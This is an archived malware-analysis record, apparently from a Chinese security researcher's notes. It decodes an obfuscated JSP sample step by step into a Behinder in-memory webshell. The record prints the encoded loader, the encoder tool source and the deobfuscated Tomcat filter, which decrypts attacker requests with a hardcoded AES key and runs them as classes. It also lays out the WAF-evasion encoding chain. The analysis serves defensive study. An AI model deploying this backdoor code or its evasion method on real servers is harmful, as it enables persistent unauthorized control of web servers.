{
	"id": "c623c5ef-eeea-468d-b19f-5dcecaba99c4",
	"created_at": "2026-04-06T00:13:56.326166Z",
	"updated_at": "2026-04-10T03:21:40.931443Z",
	"deleted_at": null,
	"sha1_hash": "cb2daa20130b2f1b3df74dd945c60114d21a672a",
	"title": "MyDocs/BehinderShell.md at main · hktalent/MyDocs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 139478,
	"plain_text": "MyDocs/BehinderShell.md at main · hktalent/MyDocs\r\nBy hktalent\r\nArchived: 2026-04-05 21:44:32 UTC\r\nBehinder Mem Shell\r\n木马样本\r\n\u0026lt;%\\u0074\\u0072\\uuu0079 {\\uuu000a\\uuu0020 \\uuu0020 C\\uu006cas\\uu0073\\uuu004co\\uu0061d\\uuu0065\\uuu0072 \\u0063\\\r\n \\uu0020\\uu0020\\uu0020\\uuu0062yt\\uuu0065[\\u005d\\u0020b\\u0079\\uuu0074\\uuu0065\\uuu0063\\u006f\\u0064\\u0065\\uuu0020=\\\r\n \\u0020\\u0020\\u007d \\uu0063a\\u0074\\uu0063h\\u0020(C\\u006c\\uuu0061ssNo\\uu0074\\u0046o\\uu0075nd\\u0045x\\u0063e\\uuu00\r\n\\u0020\\u0020\\uuu0020\\uu0020\\u0020\\uuu0020\\uu0020 \\uuu0062y\\u0074e\\uu0063\\u006f\\u0064\\u0065 = (\\uu0062\\uuu0079\\uu\r\n\\uu0020 \\uuu0020 }\\uu000a\\uuu0020\\u0020 \\u006a\\u0061v\\uu0061\\uu002elang.\\u0072\\u0065f\\uu006cect\\uuu002e\\uu004de\r\n \\uuu0020\\uu0020\\u0020\\u0063l\\uuu007a.\\u006ee\\uu0077In\\uu0073t\\uuu0061\\uuu006ece();\\uu000a} \\uu0063\\uuu0061\\uuu0\r\n解码方法\r\n无法直接Unicode解码,观察Unicode编码存在\\uuu,\\uu,\\u,是畸形Unicode编码 \\uuu0079 y \\uu006c l \\u0074 t\r\n\\uuu0079 = \\uu0079 =\\u0079 = y 因此替换\\uuu和\\uu 统一替换成 \\u 再进行Unicode解码(一段一段的解码)\r\n大致代码如下\r\n\u003c%try {\r\n ClassLoader czoader = Thread.currentThread().getContextClassLoader();\r\n StringczName= \"Scrobicular\";\r\n StringclzBytecodeBase64Str= \"xxxxx\";\r\n byte[]bytecode=null;\r\n try{\r\n Classbase64Clz=czoader.loadClass(\"java.util.Base64\");\r\n ClassdecoderClz=czoader.loadClass(\"java.util.Base64$Decoder\");\r\n Objectdecoder=base64Clz.getMethod(\"getDecoder\").invoke(base64Clz);\r\n bytecode=(byte[]) decoderClz.getMethod(\"decode\",String.class).invoke(decoder, clzBytecodeBase64St\r\n } catch(ClassNotFoundException e){\r\n Class datatypeConverterClz =czoader.loadClass(\"javax.xml.bind.DatatypeConverter\");\r\n bytecode = (byte[]) datatypeConverterClz.getMethod(\"parseBase64Binary\", String.cass).invoke(datat\r\n }\r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 1 of 6\n\njava.lang.reflect.MethoddefineClzMethod =clzoader.loadClass(\"java.lang.ClassLoader\").getDecaredMeth\r\n defineClzMethod.setAccessible(true);\r\n Class clz =(Class) defineClzMethod.invoke(clzoader, clzName, bytecode, 0,bytecode.length);\r\n cz.newInstance();\r\n} catch (Exceptione) {}%\u003e\r\n通过github搜索\"base64Clz\",看到这个项目https://github.com/TimelineSec/ATTCK-Tools-library/tree/master/JspEncoder\r\n使用方法\r\nJsp文件Unicode解码：java -jar JspEncoder.jar UniDe srcFile desFile\r\nJsp文件Unicode编码：java -jar JspEncoder.jar UniEn srcFile desFile\r\nJspx文件Html解码：java -jar JspEncoder.jar HtmlDe srcFile desFile\r\nJspx文件Html编码：java -jar JspEncoder.jar HtmlEn srcFile desFile\r\nJspx文件CDATA解码：java -jar JspEncoder.jar CdataDe srcFile desFile\r\nJspx文件CDATA编码：java -jar JspEncoder.jar CdataEn srcFile desFile\r\nBase64文件输出为class文件：java -jar JspEncoder.jar ClassOut srcFile desFile\r\nclass文件输出为Base64文件：java -jar JspEncoder.jar ClassIn srcFile desFile\r\n编码源代码如下,发现和天眼捕获到的特征类似,故用此解码尝试\r\nimport java.io.*;\r\npublic class encoderJsp {\r\n public encoderJsp(String srcFile, String desFile) throws IOException {\r\n FileInputStream fis = new FileInputStream(srcFile); //文件输入流\r\n InputStreamReader isr = new InputStreamReader(fis); //输入流读取器\r\n BufferedReader br = new BufferedReader(isr); //字符流读取器\r\n String line = \"\";\r\n String text = \"\";\r\n while ((line = br.readLine())!= null){\r\n text += line;\r\n }\r\n String subString = text.substring(2,text.length()-2);\r\n char[] charArray = subString.toCharArray();\r\n String result = \"\u003c%\";\r\n for (int i=0;i\u003ccharArray.length;i++){\r\n if (i==0 || i%8 == 0){\r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 2 of 6\n\nString firstHex = Integer.toHexString(charArray[i]);\r\n if (firstHex.length()==2){\r\n firstHex = \"00\" + firstHex;\r\n result = result + \"\\\\uu\" + firstHex;\r\n }\r\n }else if ((i%8 != 0) \u0026\u0026 (i%9 == 0)){\r\n String nineHex = Integer.toHexString(charArray[i]);\r\n if (nineHex.length() == 2) {\r\n nineHex = \"00\" + nineHex;\r\n result = result + \"\\\\uuu\" + nineHex;\r\n }\r\n }else if ((i != 0) \u0026\u0026 (i%8 != 0) \u0026\u0026 (i%9 != 0) \u0026\u0026 (i%55 == 0)){\r\n result = result + charArray[i];\r\n } else{\r\n String elseHex = Integer.toHexString(charArray[i]);\r\n if (elseHex.length() == 2) {\r\n elseHex = \"00\" + elseHex;\r\n result = result + \"\\\\u\" + elseHex;\r\n }\r\n }\r\n }\r\n result = result + \"%\u003e\";\r\n FileWriter writer = new FileWriter(desFile);\r\n writer.write(\"\");\r\n writer.write(result);\r\n writer.flush();\r\n writer.close();\r\n System.out.println(\"[!]文件编码完成，已输出至\" + desFile);\r\n }\r\n}\r\ndecoderJsp 解码最终代码\r\n\u003c%try {\r\n ClassLoader clzLoader = Thread.currentThread().getContextClassLoader();\r\n String clzName = \"Scrobicular\";\r\n String clzBytecodeBase64Str = \"yv66vgAAADIBHwcAcAcAdAgAMAcAjwgAFwcAcggBDggAVgEACVpLTTE1LjAuMAEADW\r\n try {\r\n Class base64Clz = clzLoader.loadClass(\"java.util.Base64\");\r\n Class decoderClz = clzLoader.loadClass(\"java.util.Base64$Decoder\");\r\n Object decoder = base64Clz.getMethod(\"getDecoder\").invoke(base64Clz);\r\n bytecode = (byte[]) decoderClz.getMethod(\"decode\", String.class).invoke(decoder, clzBytecodeB\r\n Class datatypeConverterClz = clzLoader.loadClass(\"javax.xml.bind.DatatypeConverter\");\r\n java.lang.reflect.Method defineClzMethod = clzLoader.loadClass(\"java.lang.ClassLoader\").getDecla\r\n defineClzMethod.setAccessible(true);\r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 3 of 6\n\nClass clz = (Class) defineClzMethod.invoke(clzLoader, clzName, bytecode, 0, bytecode.length);\r\n} catch (Exception e) {}%\u003e\r\n1、通过反射的方式执行clzBytecodeBase64Str,故我们需要解码clzBytecodeBase64Str相关内容,将\r\nclzBytecodeBase64Str内容提取出来调用classOut相关函数即可,也可用python脚本执行(需要在linux下执行,\r\n否则会被截断)\r\n2、将获得的class 用hex编辑器查看发现ZKM15 字段搜索没搜索出什么(贾老师提示是 混淆),再次用Google\r\nSearch \"java ZKM15\" 发现相关文章\r\n3、此时我们需要反混淆的工具,经过尝试(https://github.com/java-deobfuscator/deobfuscator) 工具可以用\r\n4、deobfuscator工具使用注意事项(1、需要将得到的class打包成zip,2、选中ZKM15的相关特征即可)\r\n5、用Luyten(https://github.com/deathmarine/Luyten) 工具反编译class文件 (经过解混淆发现和没有解混淆差\r\n别不大,clzBytecodeBase64Str开头相同结尾不同,不注意以为是解混淆失败。其实已经成功了)\r\n经过两次反混淆后得到的class如下\r\npackage org.apache.catalina.filters;\r\nimport java.lang.reflect.*;\r\nimport javax.servlet.http.*;\r\nimport javax.crypto.*;\r\nimport javax.crypto.spec.*;\r\nimport java.security.*;\r\nimport javax.servlet.*;\r\nimport java.io.*;\r\npublic class MelebioseFilter implements Filter\r\n{\r\n public static int a;\r\n public static int b;\r\n \r\n private Class b(final Object[] array) {\r\n final byte[] array2 = (byte[])array[0];\r\n try {\r\n final ClassLoader classLoader = this.getClass().getClassLoader();\r\n final Method declaredMethod = classLoader.loadClass(\"java.lang.ClassLoader\").getDeclaredM\r\n declaredMethod.setAccessible(true);\r\n return (Class)declaredMethod.invoke(classLoader, null, array2, 0, array2.length);\r\n }\r\n catch (Throwable t) {\r\n throw new RuntimeException(t);\r\n }\r\n }\r\n \r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 4 of 6\n\nprivate byte[] a(final Object[] array) {\r\n final String s = (String)array[0];\r\n try {\r\n final ClassLoader classLoader = this.getClass().getClassLoader();\r\n byte[] array2;\r\n try {\r\n final Class\u003c?\u003e loadClass = classLoader.loadClass(\"java.util.Base64\");\r\n array2 = (byte[])classLoader.loadClass(\"java.util.Base64$Decoder\").getMethod(\"decode\r\n }\r\n catch (ClassNotFoundException ex) {\r\n final Class\u003c?\u003e loadClass2 = classLoader.loadClass(\"javax.xml.bind.DatatypeConverter\"\r\n array2 = (byte[])loadClass2.getMethod(\"parseBase64Binary\", String.class).invoke(loadC\r\n }\r\n return array2;\r\n }\r\n catch (Throwable t) {\r\n throw new RuntimeException(t);\r\n }\r\n }\r\n \r\n public void init(final FilterConfig filterConfig) throws ServletException {\r\n }\r\n \r\n public void doFilter(final ServletRequest servletRequest, final ServletResponse servletResponse,\r\n final int b = MelebioseFilter.b;\r\n final HttpServletRequest httpServletRequest = (HttpServletRequest)servletRequest;\r\n final int n = b;\r\n final HttpServletResponse httpServletResponse = (HttpServletResponse)servletResponse;\r\n if (httpServletRequest.getHeader(\"User-Agent\") != null \u0026\u0026 httpServletRequest.getHeader(\"User-\r\n final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();\r\n Label_0312: {\r\n try {\r\n if (httpServletRequest.getSession().getAttribute(\"u\") == null) {\r\n httpServletRequest.getSession().setAttribute(\"u\", (Object)\"7b35dabef09e402b\"\r\n }\r\n final Cipher instance = Cipher.getInstance(\"AES\");\r\n instance.init(2, new SecretKeySpec(((String)httpServletRequest.getSession().getAt\r\n final ServletInputStream inputStream = httpServletRequest.getInputStream();\r\n final byte[] array = new byte[1024];\r\n int read;\r\n while ((read = inputStream.read(array)) != -1) {\r\n byteArrayOutputStream.write(array, 0, read);\r\n if (n != 0) {\r\n break Label_0312;\r\n }\r\n if (n != 0) {\r\n break;\r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 5 of 6\n\n}\r\n }\r\n this.b(new Object[] { instance.doFinal(this.a(new Object[] { new String(byteArray\r\n }\r\n catch (Throwable t) {\r\n filterChain.doFilter(servletRequest, servletResponse);\r\n }\r\n finally {\r\n byteArrayOutputStream.close();\r\n }\r\n }\r\n if (n == 0) {\r\n return;\r\n }\r\n }\r\n filterChain.doFilter(servletRequest, servletResponse);\r\n }\r\n \r\n public void destroy() {\r\n }\r\n}\r\n可以发现是冰蝎内存马,整个内存马过Waf的处理流程如下\r\n冰蝎内存马--\u003eZKM15混淆--\u003eclass文件输出为Base64文件--\u003eZKM15混淆--\u003eclass文件输出为Base64文件--\u003e\r\n特殊Unicode编码\r\n不知道混淆的情况下使用以下方法 https://mp.weixin.qq.com/s/yvEHxhsedSwB12PTcQ5aRg\r\nSource: https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nhttps://github.com/hktalent/MyDocs/blob/main/BehinderShell.md\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md"
	],
	"report_names": [
		"BehinderShell.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434436,
	"ts_updated_at": 1775791300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.pdf",
		"text": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.txt",
		"img": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.jpg"
	}
}